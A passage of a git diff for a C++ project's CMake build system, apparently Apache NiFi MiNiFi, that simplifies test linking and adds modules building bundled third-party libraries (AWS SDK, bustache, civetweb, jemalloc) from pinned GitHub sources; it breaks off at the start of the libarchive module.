+### Interface libraries
+[Interface libraries](https://cmake.org/cmake/help/v3.2/manual/cmake-buildsystem.7.html#interface-libraries) can be used to create targets from header-only libraries and use them the same way as any other library target.
+
+Header-only third party libraries are placed in the `thirdparty` directory and an interface library target is created from them.
+
+Example:
+```
+add_library(foo INTERFACE)
+target_include_directories(foo INTERFACE "${CMAKE_CURRENT_SOURCE_DIR}/thirdparty/libfoo-1.0.0")
+```
diff --git a/cmake/BuildTests.cmake b/cmake/BuildTests.cmake
index db8aa67..8779d86 100644
--- a/cmake/BuildTests.cmake
+++ b/cmake/BuildTests.cmake
@@ -37,9 +37,6 @@
 
 function(appendIncludes testName)
     target_include_directories(${testName} BEFORE PRIVATE "${CMAKE_SOURCE_DIR}/thirdparty/catch")
-    target_include_directories(${testName} BEFORE PRIVATE "${CMAKE_SOURCE_DIR}/thirdparty/cron")
-    target_include_directories(${testName} BEFORE PRIVATE "${CMAKE_SOURCE_DIR}/thirdparty/spdlog-20170710/include")
-    target_include_directories(${testName} BEFORE PRIVATE "${CMAKE_SOURCE_DIR}/thirdparty/yaml-cpp-yaml-cpp-0.5.3/include")
     target_include_directories(${testName} BEFORE PRIVATE "${CMAKE_SOURCE_DIR}/include")
     target_include_directories(${testName} BEFORE PRIVATE "${CMAKE_SOURCE_DIR}/libminifi/include/")
     target_include_directories(${testName} BEFORE PRIVATE "${CMAKE_SOURCE_DIR}/libminifi/include/c2/protocols")
@@ -74,17 +71,10 @@
     if (Boost_FOUND)
         target_include_directories(${testName} BEFORE PRIVATE "${Boost_INCLUDE_DIRS}")
     endif()
-    target_link_libraries(${testName} ${CMAKE_DL_LIBS} ${SPD_LIB} ${TEST_BASE_LIB})
-    target_link_libraries(${testName} ${CMAKE_THREAD_LIBS_INIT}  core-minifi yaml-cpp)
+    target_link_libraries(${testName} ${CMAKE_DL_LIBS} ${TEST_BASE_LIB})
+    target_link_libraries(${testName} ${CMAKE_THREAD_LIBS_INIT} core-minifi yaml-cpp spdlog)
     if (NOT excludeBase)
-      if (APPLE)
-  		target_link_libraries (${testName} -Wl,-all_load minifi)
-	  elseif(WIN32)
-	    target_link_libraries (${testName} minifi)
-	    set_target_properties(${testName} PROPERTIES LINK_FLAGS "${LINK_FLAGS} /WHOLEARCHIVE:minifi")
-	  else ()
-  		target_link_libraries (${testName} -Wl,--whole-archive minifi -Wl,--no-whole-archive)
-	  endif ()
+      target_wholearchive_library(${testName} minifi)
 	endif()
 	add_dependencies(${testName} minifiexe nanofi)
     if (Boost_FOUND)
@@ -95,16 +85,11 @@
 
 enable_testing(test)
 
-SET(SPD_LIB spd_lib)
-add_library(${SPD_LIB} STATIC ${SPD_SOURCES})
-
 SET(TEST_BASE_LIB test_base)
 add_library(${TEST_BASE_LIB} STATIC "${TEST_DIR}/TestBase.cpp" "${TEST_DIR}/RandomServerSocket.cpp" "${TEST_DIR}/KamikazeProcessor.cpp")
+target_link_libraries(${TEST_BASE_LIB} core-minifi)
 target_include_directories(${TEST_BASE_LIB} BEFORE PRIVATE "${CMAKE_SOURCE_DIR}/thirdparty/catch")
 target_include_directories(${TEST_BASE_LIB} BEFORE PRIVATE "${CMAKE_SOURCE_DIR}/libminifi/include/")
-target_include_directories(${TEST_BASE_LIB} BEFORE PRIVATE "${CMAKE_SOURCE_DIR}/thirdparty/cron")
-target_include_directories(${TEST_BASE_LIB} BEFORE PRIVATE "${CMAKE_SOURCE_DIR}/thirdparty/spdlog-20170710/include")
-target_include_directories(${TEST_BASE_LIB} BEFORE PRIVATE "${CIVET_THIRDPARTY_ROOT}/include")
 if(WIN32)
    	target_include_directories(${TEST_BASE_LIB} BEFORE PRIVATE "${CMAKE_SOURCE_DIR}/libminifi/opsys/win")
 else()
@@ -143,21 +128,9 @@
     target_include_directories(${testfilename} BEFORE PRIVATE "${CMAKE_SOURCE_DIR}/libminifi/test")
     appendIncludes("${testfilename}")
     target_link_libraries(${testfilename} ${CMAKE_THREAD_LIBS_INIT} ${CATCH_MAIN_LIB} ${TEST_BASE_LIB}  nanofi)
-    
-    if (APPLE)
-    	# minifi-standard-processors
-	target_link_libraries (${testfilename} -Wl,-all_load minifi-standard-processors nanofi)
-    elseif(NOT WIN32)
-	target_link_libraries (${testfilename} -Wl,--whole-archive minifi-standard-processors -Wl,--no-whole-archive)
-    else()
-	set(WIN32_ARCHIVES "${WIN32_ARCHIVES} /WHOLEARCHIVE:minifi-standard-processors")
-	target_link_libraries (${testfilename} minifi-standard-processors)
-    endif ()
-	
-    if(WIN32)
-	set_target_properties(${testfilename} PROPERTIES LINK_FLAGS "${WIN32_ARCHIVES}")
-    endif()
-    
+
+    target_wholearchive_library(${testfilename} minifi-standard-processors)
+
     MATH(EXPR UNIT_TEST_COUNT "${UNIT_TEST_COUNT}+1")
     add_test(NAME "${testfilename}" COMMAND "${testfilename}" WORKING_DIRECTORY ${TEST_DIR})
 ENDFOREACH()
diff --git a/cmake/BundledAwsSdkCpp.cmake b/cmake/BundledAwsSdkCpp.cmake
new file mode 100644
index 0000000..4690c61
--- /dev/null
+++ b/cmake/BundledAwsSdkCpp.cmake
@@ -0,0 +1,178 @@
+# Licensed to the Apache Software Foundation (ASF) under one
+# or more contributor license agreements.  See the NOTICE file
+# distributed with this work for additional information
+# regarding copyright ownership.  The ASF licenses this file
+# to you under the Apache License, Version 2.0 (the
+# "License"); you may not use this file except in compliance
+# with the License.  You may obtain a copy of the License at
+#
+#   http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing,
+# software distributed under the License is distributed on an
+# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+# KIND, either express or implied.  See the License for the
+# specific language governing permissions and limitations
+# under the License.
+
function(use_bundled_libaws SOURCE_DIR BINARY_DIR)
    # Builds the AWS SDK for C++ (S3 only) together with its C dependencies
    # (aws-c-common, aws-checksums, aws-c-event-stream) from source and exposes
    # them as imported targets in the AWS:: namespace.
    #
    # Arguments:
    #   SOURCE_DIR - project source directory (unused; kept for interface
    #                symmetry with the other use_bundled_* functions)
    #   BINARY_DIR - project binary directory; everything is installed under
    #                ${BINARY_DIR}/thirdparty/libaws-install

    # Define byproducts
    # NOTE(review): the "lib" filename prefix is kept on Windows as well;
    # confirm that the SDK's MSVC build really emits lib*-prefixed .lib files.
    if (WIN32)
        set(SUFFIX "lib")
    else()
        set(SUFFIX "a")
    endif()
    set(BYPRODUCTS
            "lib/libaws-cpp-sdk-core.${SUFFIX}"
            "lib/libaws-cpp-sdk-s3.${SUFFIX}")

    FOREACH(BYPRODUCT ${BYPRODUCTS})
        LIST(APPEND AWSSDK_LIBRARIES_LIST "${BINARY_DIR}/thirdparty/libaws-install/${BYPRODUCT}")
    ENDFOREACH(BYPRODUCT)

    # Set build options
    set(AWS_C_COMMON_CMAKE_ARGS ${PASSTHROUGH_CMAKE_ARGS}
            -DCMAKE_PREFIX_PATH=${BINARY_DIR}/thirdparty/libaws-install
            -DCMAKE_INSTALL_PREFIX=${BINARY_DIR}/thirdparty/libaws-install
            -DENABLE_TESTING=OFF
            -DBUILD_SHARED_LIBS=OFF)

    append_third_party_passthrough_args(AWS_C_COMMON_CMAKE_ARGS "${AWS_C_COMMON_CMAKE_ARGS}")

    set(AWS_CHECKSUM_CMAKE_ARGS ${PASSTHROUGH_CMAKE_ARGS}
            -DCMAKE_PREFIX_PATH=${BINARY_DIR}/thirdparty/libaws-install
            -DCMAKE_INSTALL_PREFIX=${BINARY_DIR}/thirdparty/libaws-install
            -DBUILD_SHARED_LIBS=OFF)

    append_third_party_passthrough_args(AWS_CHECKSUM_CMAKE_ARGS "${AWS_CHECKSUM_CMAKE_ARGS}")

    set(AWS_C_EVENT_STREAM_CMAKE_ARGS ${PASSTHROUGH_CMAKE_ARGS}
            -DCMAKE_PREFIX_PATH=${BINARY_DIR}/thirdparty/libaws-install
            -DCMAKE_INSTALL_PREFIX=${BINARY_DIR}/thirdparty/libaws-install
            -DBUILD_SHARED_LIBS=OFF)

    append_third_party_passthrough_args(AWS_C_EVENT_STREAM_CMAKE_ARGS "${AWS_C_EVENT_STREAM_CMAKE_ARGS}")

    set(AWS_SDK_CPP_CMAKE_ARGS ${PASSTHROUGH_CMAKE_ARGS}
            -DCMAKE_PREFIX_PATH=${BINARY_DIR}/thirdparty/libaws-install
            -DCMAKE_INSTALL_PREFIX=${BINARY_DIR}/thirdparty/libaws-install
            -DBUILD_ONLY=s3
            -DENABLE_TESTING=OFF
            -DBUILD_SHARED_LIBS=OFF
            -DENABLE_UNITY_BUILD=ON
            -DBUILD_DEPS=OFF)

    append_third_party_passthrough_args(AWS_SDK_CPP_CMAKE_ARGS "${AWS_SDK_CPP_CMAKE_ARGS}")

    # Build project
    ExternalProject_Add(
            aws-c-common-external
            GIT_REPOSITORY "https://github.com/awslabs/aws-c-common.git"
            GIT_TAG "ac02e1728d740bb9106b6ea727cd3378f8ea438a"
            SOURCE_DIR "${BINARY_DIR}/thirdparty/aws-c-common-src"
            INSTALL_DIR "${BINARY_DIR}/thirdparty/libaws-install"
            LIST_SEPARATOR % # This is needed for passing semicolon-separated lists
            CMAKE_ARGS ${AWS_C_COMMON_CMAKE_ARGS}
            BUILD_BYPRODUCTS "${BINARY_DIR}/thirdparty/libaws-install/lib/libaws-c-common.${SUFFIX}"
            EXCLUDE_FROM_ALL TRUE
    )
    ExternalProject_Add(
            aws-checksum-external
            GIT_REPOSITORY "https://github.com/awslabs/aws-checksums.git"
            GIT_TAG "41dc36d14b0898bd34e3f91c808fcb00f5e21875"
            SOURCE_DIR "${BINARY_DIR}/thirdparty/aws-checksums-src"
            INSTALL_DIR "${BINARY_DIR}/thirdparty/libaws-install"
            LIST_SEPARATOR % # This is needed for passing semicolon-separated lists
            CMAKE_ARGS ${AWS_CHECKSUM_CMAKE_ARGS}
            BUILD_BYPRODUCTS "${BINARY_DIR}/thirdparty/libaws-install/lib/libaws-checksums.${SUFFIX}"
            EXCLUDE_FROM_ALL TRUE
    )
    ExternalProject_Add(
            aws-c-event-stream-external
            GIT_REPOSITORY "https://github.com/awslabs/aws-c-event-stream.git"
            GIT_TAG "97ab2e57e83ad114679dbee0dcfb5048640debe7"
            SOURCE_DIR "${BINARY_DIR}/thirdparty/aws-c-event-stream-src"
            INSTALL_DIR "${BINARY_DIR}/thirdparty/libaws-install"
            LIST_SEPARATOR % # This is needed for passing semicolon-separated lists
            CMAKE_ARGS ${AWS_C_EVENT_STREAM_CMAKE_ARGS}
            BUILD_BYPRODUCTS "${BINARY_DIR}/thirdparty/libaws-install/lib/libaws-c-event-stream.${SUFFIX}"
            EXCLUDE_FROM_ALL TRUE
    )
    ExternalProject_Add(
            aws-sdk-cpp-external
            GIT_REPOSITORY "https://github.com/aws/aws-sdk-cpp.git"
            GIT_TAG "1.7.109"
            SOURCE_DIR "${BINARY_DIR}/thirdparty/aws-sdk-cpp-src"
            INSTALL_DIR "${BINARY_DIR}/thirdparty/libaws-install"
            LIST_SEPARATOR % # This is needed for passing semicolon-separated lists
            CMAKE_ARGS ${AWS_SDK_CPP_CMAKE_ARGS}
            BUILD_BYPRODUCTS "${AWSSDK_LIBRARIES_LIST}"
            EXCLUDE_FROM_ALL TRUE
    )

    # Set dependencies
    add_dependencies(aws-c-common-external CURL::libcurl OpenSSL::Crypto OpenSSL::SSL ZLIB::ZLIB)
    add_dependencies(aws-checksum-external CURL::libcurl OpenSSL::Crypto OpenSSL::SSL ZLIB::ZLIB)
    add_dependencies(aws-c-event-stream-external CURL::libcurl OpenSSL::Crypto OpenSSL::SSL ZLIB::ZLIB)
    add_dependencies(aws-c-event-stream-external aws-c-common-external aws-checksum-external)
    add_dependencies(aws-sdk-cpp-external CURL::libcurl OpenSSL::Crypto OpenSSL::SSL ZLIB::ZLIB)
    add_dependencies(aws-sdk-cpp-external aws-c-event-stream-external aws-c-common-external aws-checksum-external)

    # Set variables
    set(LIBAWS_FOUND "YES" CACHE STRING "" FORCE)
    set(LIBAWS_INCLUDE_DIR "${BINARY_DIR}/thirdparty/libaws-install/include" CACHE STRING "" FORCE)
    set(LIBAWS_LIBRARIES
            ${AWSSDK_LIBRARIES_LIST}
            "${BINARY_DIR}/thirdparty/libaws-install/lib/libaws-c-event-stream.${SUFFIX}"
            "${BINARY_DIR}/thirdparty/libaws-install/lib/libaws-c-common.${SUFFIX}"
            "${BINARY_DIR}/thirdparty/libaws-install/lib/libaws-checksums.${SUFFIX}"
            CACHE STRING "" FORCE)

    # Create imported targets
    file(MAKE_DIRECTORY ${LIBAWS_INCLUDE_DIR})

    add_library(AWS::aws-c-common STATIC IMPORTED)
    set_target_properties(AWS::aws-c-common PROPERTIES IMPORTED_LOCATION "${BINARY_DIR}/thirdparty/libaws-install/lib/libaws-c-common.${SUFFIX}")
    add_dependencies(AWS::aws-c-common aws-c-common-external)
    set_property(TARGET AWS::aws-c-common APPEND PROPERTY INTERFACE_INCLUDE_DIRECTORIES ${LIBAWS_INCLUDE_DIR})
    set_property(TARGET AWS::aws-c-common APPEND PROPERTY INTERFACE_LINK_LIBRARIES CURL::libcurl OpenSSL::Crypto OpenSSL::SSL ZLIB::ZLIB)
    if (APPLE)
        set_property(TARGET AWS::aws-c-common APPEND PROPERTY INTERFACE_LINK_LIBRARIES "-framework CoreFoundation")
    endif()

    add_library(AWS::aws-checksums STATIC IMPORTED)
    set_target_properties(AWS::aws-checksums PROPERTIES IMPORTED_LOCATION "${BINARY_DIR}/thirdparty/libaws-install/lib/libaws-checksums.${SUFFIX}")
    # Fixed: the ExternalProject defined above is "aws-checksum-external"
    # (singular); the previous "aws-checksums-external" named a target that
    # does not exist, so add_dependencies would fail at generate time.
    add_dependencies(AWS::aws-checksums aws-checksum-external)
    set_property(TARGET AWS::aws-checksums APPEND PROPERTY INTERFACE_INCLUDE_DIRECTORIES ${LIBAWS_INCLUDE_DIR})
    set_property(TARGET AWS::aws-checksums APPEND PROPERTY INTERFACE_LINK_LIBRARIES CURL::libcurl OpenSSL::Crypto OpenSSL::SSL ZLIB::ZLIB)
    if (APPLE)
        set_property(TARGET AWS::aws-checksums APPEND PROPERTY INTERFACE_LINK_LIBRARIES "-framework CoreFoundation")
    endif()

    add_library(AWS::aws-c-event-stream STATIC IMPORTED)
    set_target_properties(AWS::aws-c-event-stream PROPERTIES IMPORTED_LOCATION "${BINARY_DIR}/thirdparty/libaws-install/lib/libaws-c-event-stream.${SUFFIX}")
    add_dependencies(AWS::aws-c-event-stream aws-c-event-stream-external)
    set_property(TARGET AWS::aws-c-event-stream APPEND PROPERTY INTERFACE_INCLUDE_DIRECTORIES ${LIBAWS_INCLUDE_DIR})
    set_property(TARGET AWS::aws-c-event-stream APPEND PROPERTY INTERFACE_LINK_LIBRARIES AWS::aws-c-common AWS::aws-checksums CURL::libcurl OpenSSL::Crypto OpenSSL::SSL ZLIB::ZLIB)
    if (APPLE)
        set_property(TARGET AWS::aws-c-event-stream APPEND PROPERTY INTERFACE_LINK_LIBRARIES "-framework CoreFoundation")
    endif()

    add_library(AWS::aws-cpp-sdk-core STATIC IMPORTED)
    set_target_properties(AWS::aws-cpp-sdk-core PROPERTIES IMPORTED_LOCATION "${BINARY_DIR}/thirdparty/libaws-install/lib/libaws-cpp-sdk-core.${SUFFIX}")
    add_dependencies(AWS::aws-cpp-sdk-core aws-sdk-cpp-external)
    set_property(TARGET AWS::aws-cpp-sdk-core APPEND PROPERTY INTERFACE_INCLUDE_DIRECTORIES ${LIBAWS_INCLUDE_DIR})
    set_property(TARGET AWS::aws-cpp-sdk-core APPEND PROPERTY INTERFACE_LINK_LIBRARIES AWS::aws-c-event-stream AWS::aws-c-common AWS::aws-checksums CURL::libcurl OpenSSL::Crypto OpenSSL::SSL ZLIB::ZLIB)
    if (APPLE)
        set_property(TARGET AWS::aws-cpp-sdk-core APPEND PROPERTY INTERFACE_LINK_LIBRARIES "-framework CoreFoundation")
    endif()

    add_library(AWS::aws-cpp-sdk-s3 STATIC IMPORTED)
    set_target_properties(AWS::aws-cpp-sdk-s3 PROPERTIES IMPORTED_LOCATION "${BINARY_DIR}/thirdparty/libaws-install/lib/libaws-cpp-sdk-s3.${SUFFIX}")
    add_dependencies(AWS::aws-cpp-sdk-s3 aws-sdk-cpp-external)
    set_property(TARGET AWS::aws-cpp-sdk-s3 APPEND PROPERTY INTERFACE_INCLUDE_DIRECTORIES ${LIBAWS_INCLUDE_DIR})
    set_property(TARGET AWS::aws-cpp-sdk-s3 APPEND PROPERTY INTERFACE_LINK_LIBRARIES CURL::libcurl OpenSSL::Crypto OpenSSL::SSL ZLIB::ZLIB)
    if (APPLE)
        set_property(TARGET AWS::aws-cpp-sdk-s3 APPEND PROPERTY INTERFACE_LINK_LIBRARIES "-framework CoreFoundation")
    endif()
endfunction(use_bundled_libaws)
diff --git a/cmake/BundledBustache.cmake b/cmake/BundledBustache.cmake
new file mode 100644
index 0000000..4ee1804
--- /dev/null
+++ b/cmake/BundledBustache.cmake
@@ -0,0 +1,59 @@
+# Licensed to the Apache Software Foundation (ASF) under one
+# or more contributor license agreements.  See the NOTICE file
+# distributed with this work for additional information
+# regarding copyright ownership.  The ASF licenses this file
+# to you under the Apache License, Version 2.0 (the
+# "License"); you may not use this file except in compliance
+# with the License.  You may obtain a copy of the License at
+#
+#   http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing,
+# software distributed under the License is distributed on an
+# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+# KIND, either express or implied.  See the License for the
+# specific language governing permissions and limitations
+# under the License.
+
function(use_bundled_bustache SOURCE_DIR BINARY_DIR)
    # Builds the bundled bustache (mustache templating) library via
    # ExternalProject and exposes it as the imported target BUSTACHE::libbustache.
    #
    # Arguments:
    #   SOURCE_DIR - project source directory (unused; interface symmetry with
    #                the other use_bundled_* functions)
    #   BINARY_DIR - project binary directory; install goes under
    #                ${BINARY_DIR}/thirdparty/bustache-install

    # bustache's public headers require Boost
    find_package(Boost COMPONENTS system filesystem iostreams REQUIRED)

    # Define byproducts
    if (WIN32)
        set(BYPRODUCT "lib/bustache.lib")
    else()
        set(BYPRODUCT "lib/libbustache.a")
    endif()

    # Set build options
    # Fixed: install under the BINARY_DIR function argument like every other
    # bundled library, instead of CMAKE_CURRENT_BINARY_DIR.
    set(BUSTACHE_BYPRODUCT_DIR "${BINARY_DIR}/thirdparty/bustache-install")

    set(BUSTACHE_CMAKE_ARGS ${PASSTHROUGH_CMAKE_ARGS}
            "-DCMAKE_INSTALL_PREFIX=${BUSTACHE_BYPRODUCT_DIR}"
            "-DBUSTACHE_ENABLE_TESTING=OFF")

    # Build project
    # Fixed: "GIT" is not a valid ExternalProject_Add keyword; the repository
    # URL must be given as GIT_REPOSITORY, otherwise the download step is broken.
    ExternalProject_Add(
            bustache-external
            GIT_REPOSITORY "https://github.com/jamboree/bustache.git"
            GIT_TAG "42dee8ef9bbcae7e9a33500a116cfd9c314662d6"
            SOURCE_DIR "${BINARY_DIR}/thirdparty/bustache-src"
            CMAKE_ARGS ${BUSTACHE_CMAKE_ARGS}
            BUILD_BYPRODUCTS "${BUSTACHE_BYPRODUCT_DIR}/${BYPRODUCT}"
            EXCLUDE_FROM_ALL TRUE
    )

    # Set variables
    set(BUSTACHE_FOUND "YES" CACHE STRING "" FORCE)
    set(BUSTACHE_INCLUDE_DIR "${BUSTACHE_BYPRODUCT_DIR}/include" CACHE STRING "" FORCE)
    set(BUSTACHE_LIBRARY "${BUSTACHE_BYPRODUCT_DIR}/${BYPRODUCT}" CACHE STRING "" FORCE)

    # Create imported targets
    add_library(BUSTACHE::libbustache STATIC IMPORTED)
    set_target_properties(BUSTACHE::libbustache PROPERTIES IMPORTED_LOCATION "${BUSTACHE_LIBRARY}")
    add_dependencies(BUSTACHE::libbustache bustache-external)
    file(MAKE_DIRECTORY ${BUSTACHE_INCLUDE_DIR})
    set_property(TARGET BUSTACHE::libbustache APPEND PROPERTY INTERFACE_INCLUDE_DIRECTORIES ${BUSTACHE_INCLUDE_DIR} ${Boost_INCLUDE_DIRS})
    set_property(TARGET BUSTACHE::libbustache APPEND PROPERTY INTERFACE_LINK_LIBRARIES ${Boost_LIBRARIES})
endfunction(use_bundled_bustache)
diff --git a/cmake/BundledCivetWeb.cmake b/cmake/BundledCivetWeb.cmake
new file mode 100644
index 0000000..f5b7e11
--- /dev/null
+++ b/cmake/BundledCivetWeb.cmake
@@ -0,0 +1,101 @@
+# Licensed to the Apache Software Foundation (ASF) under one
+# or more contributor license agreements.  See the NOTICE file
+# distributed with this work for additional information
+# regarding copyright ownership.  The ASF licenses this file
+# to you under the Apache License, Version 2.0 (the
+# "License"); you may not use this file except in compliance
+# with the License.  You may obtain a copy of the License at
+#
+#   http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing,
+# software distributed under the License is distributed on an
+# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+# KIND, either express or implied.  See the License for the
+# specific language governing permissions and limitations
+# under the License.
+
function(use_bundled_civetweb SOURCE_DIR BINARY_DIR)
    # Builds the bundled civetweb 1.10 (C core plus C++ wrapper) and exposes it
    # as the imported targets CIVETWEB::c-library and CIVETWEB::civetweb-cpp.
    message("Using bundled civetweb")

    # Patch applied to the unpacked release tarball
    set(PATCH_CMD "${Patch_EXECUTABLE}" -p1 -i "${SOURCE_DIR}/thirdparty/civetweb/civetweb.patch")

    # Platform-specific static library naming
    if (WIN32)
        set(PREFIX "")
        set(SUFFIX "lib")
    else()
        set(PREFIX "lib")
        set(SUFFIX "a")
    endif()

    set(CIVETWEB_BIN_DIR "${BINARY_DIR}/thirdparty/civetweb-install/" CACHE STRING "" FORCE)

    # Full paths of the archives the external build produces
    set(CIVETWEB_LIBRARIES_LIST
            "${CIVETWEB_BIN_DIR}/lib/${PREFIX}civetweb.${SUFFIX}"
            "${CIVETWEB_BIN_DIR}/lib/${PREFIX}civetweb-cpp.${SUFFIX}")

    # Build options forwarded to the external CMake build
    set(CIVETWEB_CMAKE_ARGS ${PASSTHROUGH_CMAKE_ARGS}
            "-DCMAKE_INSTALL_PREFIX=${CIVETWEB_BIN_DIR}"
            -DCMAKE_POSITION_INDEPENDENT_CODE=ON
            -DCIVETWEB_ENABLE_SSL_DYNAMIC_LOADING=OFF
            -DCIVETWEB_ENABLE_CXX=ON
            -DBUILD_TESTING=OFF
            -DCIVETWEB_ALLOW_WARNINGS=ON
            -DCIVETWEB_ENABLE_ASAN=OFF # TODO
            )
    if (OPENSSL_OFF)
        list(APPEND CIVETWEB_CMAKE_ARGS -DCIVETWEB_ENABLE_SSL=OFF)
    endif()

    append_third_party_passthrough_args(CIVETWEB_CMAKE_ARGS "${CIVETWEB_CMAKE_ARGS}")

    # Download, patch, build and install via ExternalProject
    ExternalProject_Add(
            civetweb-external
            URL "https://github.com/civetweb/civetweb/archive/v1.10.tar.gz"
            URL_HASH "SHA256=e6958f005aa01b02645bd3ff9760dd085e83d30530cdd97b584632419195bea5"
            SOURCE_DIR "${BINARY_DIR}/thirdparty/civetweb-src"
            LIST_SEPARATOR % # This is needed for passing semicolon-separated lists
            CMAKE_ARGS ${CIVETWEB_CMAKE_ARGS}
            PATCH_COMMAND ${PATCH_CMD}
            BUILD_BYPRODUCTS "${CIVETWEB_LIBRARIES_LIST}"
            EXCLUDE_FROM_ALL TRUE
    )

    # SSL support pulls in OpenSSL unless explicitly disabled
    if (NOT OPENSSL_OFF)
        add_dependencies(civetweb-external OpenSSL::SSL OpenSSL::Crypto)
    endif()

    # Export result variables
    set(CIVETWEB_FOUND "YES" CACHE STRING "" FORCE)
    set(CIVETWEB_INCLUDE_DIR "${CIVETWEB_BIN_DIR}/include" CACHE STRING "" FORCE)
    set(CIVETWEB_LIBRARIES ${CIVETWEB_LIBRARIES_LIST} CACHE STRING "" FORCE)

    # Make the results visible to nested third-party builds via FindPackage.cmake
    set(PASSTHROUGH_VARIABLES ${PASSTHROUGH_VARIABLES} "-DEXPORTED_CIVETWEB_INCLUDE_DIR=${CIVETWEB_INCLUDE_DIR}" CACHE STRING "" FORCE)
    set(PASSTHROUGH_VARIABLES ${PASSTHROUGH_VARIABLES} "-DEXPORTED_CIVETWEB_LIBRARIES=${CIVETWEB_LIBRARIES}" CACHE STRING "" FORCE)

    # Imported targets wrapping the two static archives
    file(MAKE_DIRECTORY ${CIVETWEB_INCLUDE_DIR})

    add_library(CIVETWEB::c-library STATIC IMPORTED)
    set_target_properties(CIVETWEB::c-library PROPERTIES IMPORTED_LOCATION "${CIVETWEB_BIN_DIR}/lib/${PREFIX}civetweb.${SUFFIX}")
    set_property(TARGET CIVETWEB::c-library APPEND PROPERTY INTERFACE_INCLUDE_DIRECTORIES ${CIVETWEB_INCLUDE_DIR})
    add_dependencies(CIVETWEB::c-library civetweb-external)
    if (NOT OPENSSL_OFF)
        set_property(TARGET CIVETWEB::c-library APPEND PROPERTY INTERFACE_LINK_LIBRARIES OpenSSL::SSL OpenSSL::Crypto)
    endif()

    add_library(CIVETWEB::civetweb-cpp STATIC IMPORTED)
    set_target_properties(CIVETWEB::civetweb-cpp PROPERTIES IMPORTED_LOCATION "${CIVETWEB_BIN_DIR}/lib/${PREFIX}civetweb-cpp.${SUFFIX}")
    set_property(TARGET CIVETWEB::civetweb-cpp APPEND PROPERTY INTERFACE_LINK_LIBRARIES CIVETWEB::c-library)
    add_dependencies(CIVETWEB::civetweb-cpp civetweb-external)
endfunction(use_bundled_civetweb)
diff --git a/cmake/BundledJemalloc.cmake b/cmake/BundledJemalloc.cmake
new file mode 100644
index 0000000..c4bdfc8
--- /dev/null
+++ b/cmake/BundledJemalloc.cmake
@@ -0,0 +1,55 @@
+# Licensed to the Apache Software Foundation (ASF) under one
+# or more contributor license agreements.  See the NOTICE file
+# distributed with this work for additional information
+# regarding copyright ownership.  The ASF licenses this file
+# to you under the Apache License, Version 2.0 (the
+# "License"); you may not use this file except in compliance
+# with the License.  You may obtain a copy of the License at
+#
+#   http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing,
+# software distributed under the License is distributed on an
+# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+# KIND, either express or implied.  See the License for the
+# specific language governing permissions and limitations
+# under the License.
+
function(use_bundled_jemalloc SOURCE_DIR BINARY_DIR)
    # Builds the bundled jemalloc 5.1.0 in-source with autotools and exposes it
    # as the imported target JeMalloc::JeMalloc.
    message("Using bundled jemalloc")

    set(JEMALLOC_BYPRODUCT "lib/libjemalloc.a")
    set(JEMALLOC_SRC_DIR "${BINARY_DIR}/thirdparty/jemalloc-src")

    # jemalloc uses autotools: configuration runs in the patch step, the build
    # happens in-source, and the install step is skipped on purpose (the
    # archive is consumed straight out of the source tree).
    ExternalProject_Add(
            jemalloc-external
            GIT_REPOSITORY "https://github.com/jemalloc/jemalloc.git"
            GIT_TAG "5.1.0"
            PREFIX "${BINARY_DIR}/thirdparty/jemalloc"
            BUILD_IN_SOURCE true
            SOURCE_DIR "${JEMALLOC_SRC_DIR}"
            BUILD_COMMAND make
            CMAKE_COMMAND ""
            UPDATE_COMMAND ""
            BUILD_BYPRODUCTS "${JEMALLOC_SRC_DIR}/${JEMALLOC_BYPRODUCT}"
            INSTALL_COMMAND ${CMAKE_COMMAND} -E echo "Skipping install step."
            CONFIGURE_COMMAND ""
            PATCH_COMMAND ./autogen.sh && ./configure
            STEP_TARGETS build
            EXCLUDE_FROM_ALL TRUE
    )

    # Export result variables
    set(JEMALLOC_FOUND "YES" CACHE STRING "" FORCE)
    set(JEMALLOC_INCLUDE_DIRS "${JEMALLOC_SRC_DIR}/include" CACHE STRING "" FORCE)
    set(JEMALLOC_LIBRARY "${JEMALLOC_SRC_DIR}/${JEMALLOC_BYPRODUCT}" CACHE STRING "" FORCE)
    set(JEMALLOC_LIBRARIES "${JEMALLOC_LIBRARY}" CACHE STRING "" FORCE)

    # Imported target wrapping the static archive
    file(MAKE_DIRECTORY ${JEMALLOC_INCLUDE_DIRS})
    add_library(JeMalloc::JeMalloc STATIC IMPORTED)
    set_target_properties(JeMalloc::JeMalloc PROPERTIES IMPORTED_LOCATION "${JEMALLOC_LIBRARY}")
    add_dependencies(JeMalloc::JeMalloc jemalloc-external)
    set_property(TARGET JeMalloc::JeMalloc APPEND PROPERTY INTERFACE_INCLUDE_DIRECTORIES ${JEMALLOC_INCLUDE_DIRS})
endfunction(use_bundled_jemalloc)
diff --git a/cmake/BundledLibArchive.cmake b/cmake/BundledLibArchive.cmake
new file mode 100644
index 0000000..815b9b1
--- /dev/null
+++ b/cmake/BundledLibArchive.cmake
@@ -0,0 +1,62 @@
+# Licensed to the Apache Software Foundation (ASF) under one
+# or more contributor license agreements.  See the NOTICE file
+# distributed with this work for additional information
+# regarding copyright ownership.  The ASF licenses this file
+# to you under the Apache License, Version 2.0 (the
+# "License"); you may not use this file except in compliance
+# with the License.  You may obtain a copy of the License at
+#
+#   http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing,
+# software distributed under the License is distributed on an
+# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+# KIND, either express or implied.  See the License for the
+# specific language governing permissions and limitations
+# under the License.
+
function(use_bundled_libarchive SOURCE_DIR BINARY_DIR)
    # Builds the bundled libarchive 3.3.2 via ExternalProject and exposes it as
    # the imported target "libarchive".
    #
    # Arguments:
    #   SOURCE_DIR - project source directory (used only to locate the patch)
    #   BINARY_DIR - project binary directory; install goes under
    #                ${BINARY_DIR}/thirdparty/libarchive-install

    # Define patch step
